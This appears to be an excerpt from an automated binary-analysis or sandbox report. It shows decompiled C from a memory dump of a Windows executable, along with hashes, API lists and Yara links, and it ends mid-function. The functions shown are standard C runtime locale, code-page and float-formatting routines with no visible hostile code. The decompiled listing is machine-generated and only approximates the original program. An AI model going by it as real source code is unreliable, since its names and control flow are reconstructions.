Opcode ID: 0c91c29a7c4ff6ace752cb7bdd0b63b56ee0adc3370f22763b8fd42e2c1e0b1d
Instruction ID: c7c2d87d5f94f7a950f1f6b5172bd51ec06e6178f4abeb3790cd1027c91470f5
Opcode Fuzzy Hash: 0c91c29a7c4ff6ace752cb7bdd0b63b56ee0adc3370f22763b8fd42e2c1e0b1d
Instruction Fuzzy Hash: A051A571B00629ABEB10DFA6EC41ABB77B8BF08700FD4417AE900D7250D7799908CB69

Uniqueness

Uniqueness Score: 100.00%

Function 0042F1EA, Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 253
UNIQUE

Download Yara Rule

C-Code - Quality: 73%

			E0042F1EA(void* __ecx, void* __edx, void* __eflags, void* __fp0, intOrPtr* _a4, signed short* _a8, intOrPtr _a12) {
				intOrPtr* _v8;
				short _v12;
				void* _v32;
				intOrPtr _v40;
				signed int _v52;
				char _v272;
				short _v292;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t33;
				short* _t34;
				intOrPtr* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed short _t39;
				signed short* _t42;
				intOrPtr _t45;
				void* _t47;
				signed int _t50;
				void* _t52;
				signed int _t56;
				signed int _t62;
				void* _t67;
				void* _t71;
				void* _t72;
				void* _t76;
				intOrPtr* _t83;
				short* _t85;
				intOrPtr* _t90;
				intOrPtr* _t94;
				short _t112;
				void* _t113;
				intOrPtr* _t115;
				intOrPtr _t118;
				signed int* _t119;
				intOrPtr* _t122;
				signed short _t124;
				int _t126;
				void* _t130;
				signed int _t131;

				_t160 = __fp0;
				_push(__ecx);
				_push(__ecx);
				_t83 = _a4;
				_t33 = E004251AF(__ecx, __edx, __fp0);
				_t112 = 0;
				_v12 = 0;
				_t3 = _t33 + 0x50; // 0x50
				_t122 = _t3;
				_t4 = _t122 + 0x250; // 0x2a0
				_t34 = _t4;
				 *((intOrPtr*)(_t122 + 8)) = 0;
				 *_t34 = 0;
				_t6 = _t122 + 4; // 0x54
				_t115 = _t6;
				_v8 = _t34;
				_t90 = _t83;
				_t35 = _t83 + 0x80;
				 *_t122 = _t83;
				 *_t115 = _t35;
				if( *_t35 != 0) {
					E0042F17B("<D", 0x16, _t115);
					_t90 =  *_t122;
					_t130 = _t130 + 0xc;
					_t112 = 0;
				}
				_push(_t122);
				if( *_t90 == _t112) {
					E0042EAE0(_t90);
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t115)) == _t112) {
						E0042EC04();
					} else {
						E0042EB69(_t90);
					}
					if( *((intOrPtr*)(_t122 + 8)) == 0) {
						_t76 = E0042F17B(0x43fe70, 0x40, _t122);
						_t130 = _t130 + 0xc;
						if(_t76 != 0) {
							_push(_t122);
							if( *((intOrPtr*)( *_t115)) == 0) {
								E0042EC04();
							} else {
								E0042EB69(0);
							}
							L12:
						}
					}
				}
				if( *((intOrPtr*)(_t122 + 8)) == 0) {
					L37:
					_t37 = 0;
					goto L38;
				} else {
					_t38 = _t83 + 0x100;
					if( *_t83 != 0 ||  *_t38 != 0) {
						_t39 = E0042F034(_t83, _t38, _t122);
					} else {
						_t39 = GetACP();
					}
					_t124 = _t39;
					if(_t124 == 0 || _t124 == 0xfde8 || IsValidCodePage(_t124 & 0x0000ffff) == 0) {
						goto L37;
					} else {
						_t42 = _a8;
						if(_t42 != 0) {
							 *_t42 = _t124;
						}
						_t118 = _a12;
						if(_t118 == 0) {
							L36:
							_t37 = 1;
							L38:
							return _t37;
						} else {
							_t94 = _v8;
							_t15 = _t118 + 0x120; // 0x424312
							_t85 = _t15;
							 *_t85 = 0;
							_t113 = _t94 + 2;
							do {
								_t45 =  *_t94;
								_t94 = _t94 + 2;
							} while (_t45 != _v12);
							_t96 = _t94 - _t113 >> 1;
							_push((_t94 - _t113 >> 1) + 1);
							_t47 = E0042D6F6(_t85, 0x55, _v8);
							_t131 = _t130 + 0x10;
							if(_t47 != 0) {
								L39:
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E0041A842();
								asm("int3");
								_t50 =  *0x44b6b4; // 0x4a5cc10f
								_v52 = _t50 ^ _t131;
								_push(_t85);
								_push(_t124);
								_push(_t118);
								_t52 = E004251AF(_t96, _t113, _t160);
								_t86 = _t52;
								_t119 =  *(E004251AF(_t96, _t113, _t160) + 0x34c);
								_t126 = E0042F92D(_v40);
								asm("sbb ecx, ecx");
								_t56 = GetLocaleInfoW(_t126, ( ~( *(_t52 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
								if(_t56 != 0) {
									if(E0042C37A(_t86, _t119, _t126,  *((intOrPtr*)(_t86 + 0x54)),  &_v272) == 0 && E0042FA61(_t126) != 0) {
										 *_t119 =  *_t119 | 0x00000004;
										_t119[2] = _t126;
										_t119[1] = _t126;
									}
									_t62 =  !( *_t119 >> 2) & 0x00000001;
								} else {
									 *_t119 =  *_t119 & _t56;
									_t62 = _t56 + 1;
								}
								E00415A87();
								return _t62;
							} else {
								if(E00425DD7(_t85, 0x1001, _t118, 0x40) == 0) {
									goto L37;
								} else {
									_t20 = _t118 + 0x80; // 0x424272
									_t85 = _t20;
									_t21 = _t118 + 0x120; // 0x424312
									if(E00425DD7(_t21, 0x1002, _t85, 0x40) == 0) {
										goto L37;
									} else {
										_push(0x5f);
										_t67 = E00435A97(_t96);
										_t96 = _t85;
										if(_t67 != 0) {
											L31:
											_t22 = _t118 + 0x120; // 0x424312
											if(E00425DD7(_t22, 7, _t85, 0x40) == 0) {
												goto L37;
											} else {
												goto L32;
											}
										} else {
											_push(0x2e);
											_t72 = E00435A97(_t96);
											_t96 = _t85;
											if(_t72 == 0) {
												L32:
												_t118 = _t118 + 0x100;
												if(_t124 != 0xfde9) {
													E00429198(_t96, _t124, _t118, 0x10, 0xa);
													goto L36;
												} else {
													_push(5);
													_t71 = E0042D6F6(_t118, 0x10, L"utf8");
													_t131 = _t131 + 0x10;
													if(_t71 != 0) {
														goto L39;
													} else {
														goto L36;
													}
												}
											} else {
												goto L31;
											}
										}
									}
								}
							}
						}
					}
				}
			}

0x0042f1ea
0x0042f1ef
0x0042f1f0
0x0042f1f2
0x0042f1f7
0x0042f1fe
0x0042f200
0x0042f203
0x0042f203
0x0042f206
0x0042f206
0x0042f20c
0x0042f20f
0x0042f212
0x0042f212
0x0042f215
0x0042f218
0x0042f21a
0x0042f220
0x0042f222
0x0042f227
0x0042f231
0x0042f236
0x0042f238
0x0042f23b
0x0042f23b
0x0042f23d
0x0042f241
0x0042f28a
0x00000000
0x0042f243
0x0042f248
0x0042f251
0x0042f24a
0x0042f24a
0x0042f24a
0x0042f25c
0x0042f266
0x0042f26b
0x0042f270
0x0042f276
0x0042f27a
0x0042f283
0x0042f27c
0x0042f27c
0x0042f27c
0x0042f28f
0x0042f28f
0x0042f270
0x0042f25c
0x0042f295
0x0042f3d1
0x0042f3d1
0x00000000
0x0042f29b
0x0042f29b
0x0042f2a4
0x0042f2b5
0x0042f2ab
0x0042f2ab
0x0042f2ab
0x0042f2bc
0x0042f2c0
0x00000000
0x0042f2e4
0x0042f2e4
0x0042f2e9
0x0042f2eb
0x0042f2eb
0x0042f2ed
0x0042f2f2
0x0042f3cc
0x0042f3ce
0x0042f3d3
0x0042f3d9
0x0042f2f8
0x0042f2f8
0x0042f2fb
0x0042f2fb
0x0042f303
0x0042f306
0x0042f309
0x0042f309
0x0042f30c
0x0042f30f
0x0042f317
0x0042f31c
0x0042f323
0x0042f328
0x0042f32d
0x0042f3da
0x0042f3dc
0x0042f3dd
0x0042f3de
0x0042f3df
0x0042f3e0
0x0042f3e1
0x0042f3e6
0x0042f3f2
0x0042f3f9
0x0042f3fc
0x0042f3fd
0x0042f401
0x0042f402
0x0042f407
0x0042f40f
0x0042f41e
0x0042f42a
0x0042f43b
0x0042f443
0x0042f45d
0x0042f46a
0x0042f46d
0x0042f470
0x0042f470
0x0042f47a
0x0042f445
0x0042f445
0x0042f447
0x0042f447
0x0042f485
0x0042f48d
0x0042f333
0x0042f343
0x00000000
0x0042f349
0x0042f34b
0x0042f34b
0x0042f357
0x0042f365
0x00000000
0x0042f367
0x0042f367
0x0042f36a
0x0042f370
0x0042f373
0x0042f383
0x0042f388
0x0042f396
0x00000000
0x00000000
0x00000000
0x00000000
0x0042f375
0x0042f375
0x0042f378
0x0042f37e
0x0042f381
0x0042f398
0x0042f398
0x0042f3a4
0x0042f3c4
0x00000000
0x0042f3a6
0x0042f3a6
0x0042f3b0
0x0042f3b5
0x0042f3ba
0x00000000
0x0042f3bc
0x00000000
0x0042f3bc
0x0042f3ba
0x00000000
0x00000000
0x00000000
0x0042f381
0x0042f373
0x0042f365
0x0042f343
0x0042f32d
0x0042f2f2
0x0042f2c0

APIs

Part of subcall function 004251AF: GetLastError.KERNEL32(00000008,?,1FFFFFFF,00420A55,?,?,00413761,?,?,h}D,?), ref: 004251B4
Part of subcall function 004251AF: _free.LIBCMT ref: 00425211
Part of subcall function 004251AF: _free.LIBCMT ref: 00425247
Part of subcall function 004251AF: SetLastError.KERNEL32(00000000,00000005,000000FF,?,1FFFFFFF,00420A55,?,?,00413761,?,?,h}D,?), ref: 00425252

GetACP.KERNEL32(00000055,?,?,?,?,?,004241F2,?,?,?,?,?,?,00000004), ref: 0042F2AB
IsValidCodePage.KERNEL32(00000000,00000055,?,?,?,?,?,004241F2,?,?,?,?,?,?,00000004), ref: 0042F2D6

Part of subcall function 00425DD7: GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,?,?,0042431A,?,20001004,?,00000002,00000000,?,?), ref: 00425E0B

_wcschr.LIBVCRUNTIME ref: 0042F36A
_wcschr.LIBVCRUNTIME ref: 0042F378

Part of subcall function 0041A842: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0041A844
Part of subcall function 0041A842: GetCurrentProcess.KERNEL32(C0000417,?,0041370C), ref: 0041A867
Part of subcall function 0041A842: TerminateProcess.KERNEL32(00000000,?,0041370C), ref: 0041A86E

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004241F2,00000000,00424312), ref: 0042F43B

Part of subcall function 00415A87: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00416245
Part of subcall function 00415A87: ___raise_securityfailure.LIBCMT ref: 0041632C

Strings

<D, xrefs: 0042F22C
utf8, xrefs: 0042F3A8

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: ErrorFeatureInfoLastLocalePresentProcessProcessor_free_wcschr$CodeCurrentPageTerminateValid___raise_securityfailure
String ID: <D$utf8
API String ID: 1898040071-2802115382
Opcode ID: f4586264c92b4ad82fe2feb966295c344f53f042237b7131065b1fc69662f7fa
Instruction ID: 5f129e5063b6be76bd08a7cad2a1042a69838f8af12729a5e127d93b16c5962c
Opcode Fuzzy Hash: f4586264c92b4ad82fe2feb966295c344f53f042237b7131065b1fc69662f7fa
Instruction Fuzzy Hash: 67711731B00625AAEB24EB66EC46B7773B8EF49304FD0007BF905D7281EA799905C76D

Uniqueness

Uniqueness Score: 100.00%

Function 0042FB59, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 184
UNIQUE

Download Yara Rule

C-Code - Quality: 92%

			E0042FB59(void* __ecx, void* __edx, void* __eflags, void* __fp0, signed int _a4, short* _a8, short* _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed int* _v24;
				short* _v28;
				void* __ebp;
				signed int _t39;
				void* _t45;
				signed int* _t46;
				signed int _t47;
				short* _t48;
				int _t49;
				void* _t53;
				short* _t54;
				short* _t55;
				short* _t56;
				int _t63;
				int _t65;
				short* _t69;
				intOrPtr _t72;
				void* _t74;
				short* _t75;
				intOrPtr _t82;
				short* _t86;
				short* _t90;
				short** _t101;
				short* _t102;
				signed int _t105;
				signed short _t108;
				signed int _t110;
				void* _t111;

				_t128 = __fp0;
				_t39 =  *0x44b6b4; // 0x4a5cc10f
				_v8 = _t39 ^ _t110;
				_t86 = _a12;
				_t105 = _a4;
				_v28 = _a8;
				_v24 = E004251AF(__ecx, __edx, __fp0) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E004251AF(__ecx, __edx, __fp0);
				_t98 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
				_t90 = _t105 + 0x80;
				_t46 = _v24;
				 *_t46 = _t105;
				_t101 =  &(_t46[1]);
				 *_t101 = _t90;
				if(_t90 != 0 &&  *_t90 != 0) {
					_t82 =  *0x440294; // 0x17
					E0042FAF6(_t90, 0, "<D", _t82 - 1, _t101);
					_t46 = _v24;
					_t111 = _t111 + 0xc;
					_t98 = 0;
				}
				_v20 = _t98;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t98) {
					_t48 =  *_t101;
					__eflags = _t48;
					if(_t48 == 0) {
						L19:
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
						goto L20;
					}
					__eflags =  *_t48 - _t98;
					if(__eflags == 0) {
						goto L19;
					}
					E0042F490(_t90, _t98, __eflags,  &_v20);
					_pop(_t90);
					goto L20;
				} else {
					_t69 =  *_t101;
					if(_t69 == 0) {
						L8:
						E0042F576(_t90, _t98, __eflags, _t128,  &_v20);
						L9:
						_pop(_t90);
						if(_v20 != 0) {
							_t102 = 0;
							__eflags = 0;
							L25:
							asm("sbb esi, esi");
							_t108 = E0042F97E(_t90,  ~_t105 & _t105 + 0x00000100,  &_v20);
							__eflags = _t108;
							if(_t108 == 0) {
								L22:
								_t53 = 0;
								L23:
								E00415A87();
								return _t53;
							}
							_t54 = IsValidCodePage(_t108 & 0x0000ffff);
							__eflags = _t54;
							if(_t54 == 0) {
								goto L22;
							}
							_t55 = IsValidLocale(_v16, 1);
							__eflags = _t55;
							if(_t55 == 0) {
								goto L22;
							}
							_t56 = _v28;
							__eflags = _t56;
							if(_t56 != 0) {
								 *_t56 = _t108;
							}
							E00425ED5(_v16,  &(_v24[0x94]), 0x55, _t102);
							__eflags = _t86;
							if(_t86 == 0) {
								L34:
								_t53 = 1;
								goto L23;
							}
							_t33 =  &(_t86[0x90]); // 0x42430b
							E00425ED5(_v16, _t33, 0x55, _t102);
							_t63 = GetLocaleInfoW(_v16, 0x1001, _t86, 0x40);
							__eflags = _t63;
							if(_t63 == 0) {
								goto L22;
							}
							_t36 =  &(_t86[0x40]); // 0x42426b
							_t65 = GetLocaleInfoW(_v12, 0x1002, _t36, 0x40);
							__eflags = _t65;
							if(_t65 == 0) {
								goto L22;
							}
							_t38 =  &(_t86[0x80]); // 0x4242eb
							E00429198(_t38, _t108, _t38, 0x10, 0xa);
							goto L34;
						}
						_t72 =  *0x44017c; // 0x41
						_t74 = E0042FAF6(_t90, _t98, 0x43fe70, _t72 - 1, _v24);
						_t111 = _t111 + 0xc;
						if(_t74 == 0) {
							L20:
							_t102 = 0;
							__eflags = 0;
							L21:
							if(_v20 != 0) {
								goto L25;
							}
							goto L22;
						}
						_t75 =  *_t101;
						_t102 = 0;
						if(_t75 == 0) {
							L14:
							E0042F576(_t90, _t98, __eflags, _t128,  &_v20);
							L15:
							_pop(_t90);
							goto L21;
						}
						_t124 =  *_t75;
						if( *_t75 == 0) {
							goto L14;
						}
						E0042F4DB(_t90, _t98, _t124, _t128,  &_v20);
						goto L15;
					}
					_t120 =  *_t69 - _t98;
					if( *_t69 == _t98) {
						goto L8;
					}
					E0042F4DB(_t90, _t98, _t120, _t128,  &_v20);
					goto L9;
				}
			}

0x0042fb59
0x0042fb61
0x0042fb68
0x0042fb6f
0x0042fb73
0x0042fb77
0x0042fb85
0x0042fb8a
0x0042fb8b
0x0042fb8c
0x0042fb8d
0x0042fb95
0x0042fb97
0x0042fb9d
0x0042fba3
0x0042fba6
0x0042fba8
0x0042fbab
0x0042fbaf
0x0042fbb6
0x0042fbc3
0x0042fbc8
0x0042fbcb
0x0042fbce
0x0042fbce
0x0042fbd0
0x0042fbd3
0x0042fbd7
0x0042fc47
0x0042fc49
0x0042fc4b
0x0042fc5e
0x0042fc5e
0x0042fc65
0x0042fc6b
0x0042fc6e
0x00000000
0x0042fc6e
0x0042fc4d
0x0042fc50
0x00000000
0x00000000
0x0042fc56
0x0042fc5b
0x00000000
0x0042fbde
0x0042fbde
0x0042fbe2
0x0042fbf4
0x0042fbf8
0x0042fbfd
0x0042fc01
0x0042fc02
0x0042fc8c
0x0042fc8c
0x0042fc8e
0x0042fc9a
0x0042fca4
0x0042fca8
0x0042fcaa
0x0042fc79
0x0042fc79
0x0042fc7b
0x0042fc83
0x0042fc8b
0x0042fc8b
0x0042fcb0
0x0042fcb6
0x0042fcb8
0x00000000
0x00000000
0x0042fcbf
0x0042fcc5
0x0042fcc7
0x00000000
0x00000000
0x0042fcc9
0x0042fccc
0x0042fcce
0x0042fcd0
0x0042fcd0
0x0042fce1
0x0042fce6
0x0042fce8
0x0042fd48
0x0042fd4a
0x00000000
0x0042fd4a
0x0042fced
0x0042fcf7
0x0042fd07
0x0042fd0d
0x0042fd0f
0x00000000
0x00000000
0x0042fd17
0x0042fd26
0x0042fd2c
0x0042fd2e
0x00000000
0x00000000
0x0042fd38
0x0042fd40
0x00000000
0x0042fd45
0x0042fc08
0x0042fc17
0x0042fc1c
0x0042fc21
0x0042fc71
0x0042fc71
0x0042fc71
0x0042fc73
0x0042fc77
0x00000000
0x00000000
0x00000000
0x0042fc77
0x0042fc23
0x0042fc25
0x0042fc29
0x0042fc3b
0x0042fc3f
0x0042fc44
0x0042fc44
0x00000000
0x0042fc44
0x0042fc2b
0x0042fc2e
0x00000000
0x00000000
0x0042fc34
0x00000000
0x0042fc34
0x0042fbe4
0x0042fbe7
0x00000000
0x00000000
0x0042fbed
0x00000000
0x0042fbed

APIs

Part of subcall function 004251AF: GetLastError.KERNEL32(00000008,?,1FFFFFFF,00420A55,?,?,00413761,?,?,h}D,?), ref: 004251B4
Part of subcall function 004251AF: _free.LIBCMT ref: 00425211
Part of subcall function 004251AF: _free.LIBCMT ref: 00425247
Part of subcall function 004251AF: SetLastError.KERNEL32(00000000,00000005,000000FF,?,1FFFFFFF,00420A55,?,?,00413761,?,?,h}D,?), ref: 00425252

Part of subcall function 0042F576: EnumSystemLocalesW.KERNEL32(0042F856,00000001,?,?,004241EB,?,0042FBFD,004241EB,00000055,?,?,?,?,004241EB,?,?), ref: 0042F5C0

Part of subcall function 0042F4DB: EnumSystemLocalesW.KERNEL32(0042F601,00000001,00000000,?,004241EB,?,0042FC39,00000000,00000055,?,?), ref: 0042F54D

GetLocaleInfoW.KERNEL32(?,00001002,0042426B,00000040), ref: 0042FD26

Part of subcall function 0042F490: EnumSystemLocalesW.KERNEL32(0042F3E7,00000001,?,?,?,0042FC5B,004241EB,00000055,?,?,?,?,004241EB,?,?,?), ref: 0042F4C7

GetUserDefaultLCID.KERNEL32(00000055,?,?), ref: 0042FC65

Part of subcall function 00415A87: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00416245
Part of subcall function 00415A87: ___raise_securityfailure.LIBCMT ref: 0041632C

Part of subcall function 0042F97E: GetLocaleInfoW.KERNEL32(51CEB70F,2000000B,00000000,00000002,00000000,?,?,?,0042FCA4,?,00000000), ref: 0042FA17
Part of subcall function 0042F97E: GetLocaleInfoW.KERNEL32(51CEB70F,20001004,00000000,00000002,00000000,?,?,?,0042FCA4,?,00000000), ref: 0042FA40
Part of subcall function 0042F97E: GetACP.KERNEL32(?,?,0042FCA4,?,00000000), ref: 0042FA55

IsValidCodePage.KERNEL32(00000000), ref: 0042FCB0
IsValidLocale.KERNEL32(?,00000001), ref: 0042FCBF
GetLocaleInfoW.KERNEL32(?,00001001,004241EB,00000040,?,0042430B,00000055,00000000,?,?,00000055,00000000), ref: 0042FD07

Strings

<D, xrefs: 0042FBBE

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: Locale$Info$EnumLocalesSystem$ErrorLastValid_free$CodeDefaultFeaturePagePresentProcessorUser___raise_securityfailure
String ID: <D
API String ID: 2647803248-1500424421
Opcode ID: 1995012808ac0cfde1084d6f7ec7b5078daeed5deb4889796a6a9636d5fed143
Instruction ID: c7c2d87d5f94f7a950f1f6b5172bd51ec06e6178f4abeb3790cd1027c91470f5
Opcode Fuzzy Hash: 1995012808ac0cfde1084d6f7ec7b5078daeed5deb4889796a6a9636d5fed143
Instruction Fuzzy Hash: A051A571B00629ABEB10DFA6EC41ABB77B8BF08700FD4417AE900D7250D7799908CB69

Uniqueness

Uniqueness Score: 100.00%

Function 00431159, Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1363
COMMONCrypto

Download Yara Rule

C-Code - Quality: 64%

			E00431159(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v464;
				void _v468;
				signed int _v472;
				signed int _v932;
				signed int _v936;
				signed int _v1392;
				signed int _v1396;
				signed int _v1400;
				char _v1860;
				signed int _v1864;
				signed int _v1868;
				signed int _v1872;
				signed int _v1876;
				signed int _v1880;
				signed int _v1884;
				signed int _v1888;
				signed int _v1892;
				signed int _v1896;
				signed int _v1900;
				signed int _v1904;
				signed int _v1908;
				signed int _v1912;
				intOrPtr _v1916;
				signed int _v1920;
				intOrPtr* _v1924;
				signed int _v1928;
				char _v1936;
				signed int _v1944;
				char _v2404;
				signed int _v2408;
				signed int _t718;
				intOrPtr _t728;
				signed int _t732;
				signed int _t733;
				signed int _t734;
				void* _t736;
				signed int _t739;
				signed int _t740;
				signed int _t746;
				intOrPtr _t753;
				void* _t754;
				unsigned int* _t756;
				signed int _t765;
				signed int _t770;
				signed int _t771;
				signed int _t772;
				signed int _t775;
				signed int _t776;
				signed int _t777;
				signed int _t779;
				signed int _t780;
				signed int _t785;
				signed int _t786;
				signed int _t792;
				signed int _t793;
				signed int _t796;
				signed int _t801;
				signed int _t809;
				signed int* _t812;
				signed int _t816;
				signed int _t827;
				signed int _t828;
				signed int _t829;
				signed int _t830;
				char* _t831;
				signed int _t834;
				signed int _t840;
				signed int _t842;
				signed int _t846;
				signed int _t849;
				signed int _t858;
				signed int _t861;
				signed int _t863;
				signed int _t866;
				signed int _t867;
				signed int _t870;
				signed int _t883;
				signed int _t884;
				signed int _t885;
				signed int _t886;
				char* _t887;
				signed int _t890;
				signed int* _t893;
				signed int _t896;
				signed int _t898;
				signed int _t902;
				signed int _t905;
				signed int _t913;
				signed int _t916;
				signed int _t920;
				intOrPtr _t924;
				void* _t925;
				unsigned int* _t927;
				unsigned int _t937;
				signed int _t938;
				void* _t941;
				signed int _t942;
				void* _t944;
				signed int _t957;
				signed int _t959;
				unsigned int _t964;
				signed int _t965;
				void* _t968;
				signed int _t969;
				void* _t971;
				signed int _t976;
				signed int _t980;
				signed int _t982;
				void* _t989;
				signed int _t990;
				signed int _t992;
				signed int _t995;
				void* _t999;
				signed int _t1000;
				signed int _t1002;
				signed int _t1004;
				signed int _t1006;
				signed int _t1007;
				signed int _t1008;
				signed int _t1009;
				intOrPtr* _t1022;
				signed int _t1031;
				signed int _t1032;
				signed int _t1035;
				signed int _t1036;
				signed int _t1038;
				signed int _t1039;
				signed int _t1040;
				signed int _t1044;
				signed int _t1048;
				signed int _t1049;
				signed int _t1050;
				signed int _t1052;
				signed int _t1053;
				signed int _t1054;
				signed int _t1055;
				signed int _t1056;
				signed int _t1057;
				signed int _t1058;
				signed int _t1060;
				signed int _t1061;
				signed int _t1062;
				signed int _t1063;
				signed int _t1064;
				void* _t1065;
				signed int _t1066;
				intOrPtr _t1070;
				signed int _t1071;
				signed int _t1072;
				signed int _t1077;
				void* _t1078;
				intOrPtr _t1081;
				signed int _t1082;
				signed int _t1085;
				signed int _t1090;
				signed int _t1093;
				signed int _t1095;
				unsigned int _t1096;
				char _t1105;
				signed int _t1107;
				signed int _t1108;
				signed int _t1109;
				signed int _t1110;
				signed int _t1111;
				signed int _t1112;
				signed int _t1114;
				signed int _t1116;
				signed int _t1117;
				signed int _t1118;
				signed int _t1119;
				signed int _t1120;
				signed int _t1122;
				unsigned int _t1124;
				signed int _t1129;
				intOrPtr* _t1131;
				signed int _t1133;
				intOrPtr* _t1135;
				void* _t1137;
				intOrPtr _t1138;
				void* _t1142;
				signed int _t1143;
				unsigned int _t1145;
				signed int _t1146;
				signed int _t1147;
				void* _t1148;
				signed int _t1149;
				signed int _t1150;
				signed int _t1151;
				signed int _t1154;
				signed int _t1155;
				signed int _t1156;
				signed int _t1157;
				signed int _t1160;
				signed int _t1161;
				signed int _t1162;
				signed int _t1163;
				signed int _t1165;
				signed int _t1168;
				signed int _t1169;
				signed int _t1172;
				void* _t1173;
				signed int _t1174;
				signed int _t1177;
				signed int _t1178;
				signed int _t1179;
				unsigned int* _t1180;
				signed int _t1181;
				signed int _t1184;
				signed int _t1185;
				signed int _t1186;
				signed int _t1187;
				signed int _t1189;
				signed int _t1190;
				signed int _t1191;
				signed int _t1192;
				signed int _t1193;
				signed int _t1195;
				signed int _t1196;
				signed int _t1197;
				signed int _t1198;
				signed int _t1199;
				unsigned int* _t1200;
				signed int _t1201;
				signed int _t1205;
				signed int _t1207;
				signed int _t1209;
				signed int _t1211;
				signed int _t1212;
				signed int* _t1214;
				signed int* _t1215;
				signed int _t1217;
				signed int* _t1218;
				signed int _t1221;
				void* _t1228;
				signed int _t1229;

				_t1228 = __fp0;
				_t1173 = __esi;
				_t1137 = __edi;
				_t989 = __ebx;
				_t718 =  *0x44b6b4; // 0x4a5cc10f
				_v8 = _t718 ^ _t1212;
				_v1924 = _a16;
				_v1904 = _a20;
				E00434F36(__eflags,  &_v1944);
				if((_v1944 & 0x0000001f) != 0x1f) {
					E00434FA0(__eflags,  &_v1944);
					_v1936 = 1;
				} else {
					_v1936 = 0;
				}
				_push(_t989);
				_t990 = _a4;
				_push(_t1173);
				_t1174 = _a8;
				_push(_t1137);
				_t1138 = 0x20;
				_t1221 = _t1174;
				if(_t1221 > 0 || _t1221 >= 0 && _t990 >= 0) {
					_t728 = _t1138;
				} else {
					_t728 = 0x2d;
				}
				_t1022 = _v1924;
				_t1093 = _v1904;
				 *_t1022 = _t728;
				 *((intOrPtr*)(_t1022 + 8)) = _t1093;
				if((_t1174 & 0x7ff00000) != 0) {
					L11:
					_t732 = E0042850D( &_a4);
					__eflags = _t732;
					if(_t732 != 0) {
						 *(_v1924 + 4) = 1;
					}
					_t733 = _t732 - 1;
					__eflags = _t733;
					if(_t733 == 0) {
						_push("1#INF");
						goto L310;
					} else {
						_t739 = _t733 - 1;
						__eflags = _t739;
						if(_t739 == 0) {
							_push("1#QNAN");
							goto L310;
						} else {
							_t740 = _t739 - 1;
							__eflags = _t740;
							if(_t740 == 0) {
								_push("1#SNAN");
								goto L310;
							} else {
								__eflags = _t740 == 1;
								if(_t740 == 1) {
									_push("1#IND");
									L310:
									_push(_a24);
									_t1026 = _v1904;
									_push(_v1904);
									goto L311;
								} else {
									_v1928 = _v1928 & 0x00000000;
									_a8 = _t1174 & 0x7fffffff;
									_a4 = _t990;
									_t1229 = _a4;
									asm("fst qword [ebp-0x778]");
									_t1177 = _v1912;
									_v1920 = _a12 + 1;
									_t1031 = _t1177 >> 0x14;
									_t746 = _t1031 & 0x000007ff;
									__eflags = _t746;
									if(_t746 != 0) {
										_t746 = 0;
										_t992 = 0;
										__eflags = 0;
									} else {
										_t992 = 1;
									}
									_t1178 = _t1177 & 0x000fffff;
									_v1888 = _v1916 + _t746;
									asm("adc esi, edx");
									_t1032 = _t1031 & 0x000007ff;
									_v1868 = _t1032 + _t992;
									E00429BE0(_t1032, _t1229);
									_push(_t1032);
									_push(_t1032);
									 *_t1214 = _t1229;
									_t1035 = E004358A0(E00434FF0(_t1032), _t1229);
									_v1900 = _t1035;
									_t1142 = 0x20;
									__eflags = _t1035 - 0x7fffffff;
									if(_t1035 == 0x7fffffff) {
										L22:
										__eflags = 0;
										_v1900 = 0;
									} else {
										__eflags = _t1035 - 0x80000000;
										if(_t1035 == 0x80000000) {
											goto L22;
										}
									}
									_t1095 = _v1868;
									__eflags = _t1178;
									_v468 = _v1888;
									_v464 = _t1178;
									_v936 = _v936 & 0x00000000;
									_t995 = (0 | _t1178 != 0x00000000) + 1;
									_v472 = _t995;
									__eflags = _t1095 - 0x433;
									if(_t1095 < 0x433) {
										__eflags = _t1095 - 0x35;
										if(_t1095 == 0x35) {
											L110:
											_t753 =  *((intOrPtr*)(_t1212 + _t995 * 4 - 0x1d4));
											_t204 =  &_v1912;
											 *_t204 = _v1912 & 0x00000000;
											__eflags =  *_t204;
											asm("bsr eax, eax");
											if( *_t204 == 0) {
												_t754 = 0;
												__eflags = 0;
											} else {
												_t754 = _t753 + 1;
											}
											_t1179 = _t995;
